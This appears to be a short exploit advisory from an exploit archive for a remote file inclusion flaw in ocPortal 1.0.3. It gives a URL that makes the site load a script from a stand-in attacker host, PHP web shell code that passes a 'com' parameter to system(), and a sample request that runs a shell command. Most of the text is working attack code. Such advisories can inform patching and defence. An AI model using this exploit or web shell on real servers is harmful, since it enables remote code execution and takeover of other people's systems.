ocPortal 1.0.3 Remote File Inclusion

2004-10-13 00:00:00

http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



<?php

$com = $_GET["com"];

system ("$com");

?>



Example of funcs.php if your host support php.



<?php

echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

?>



http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.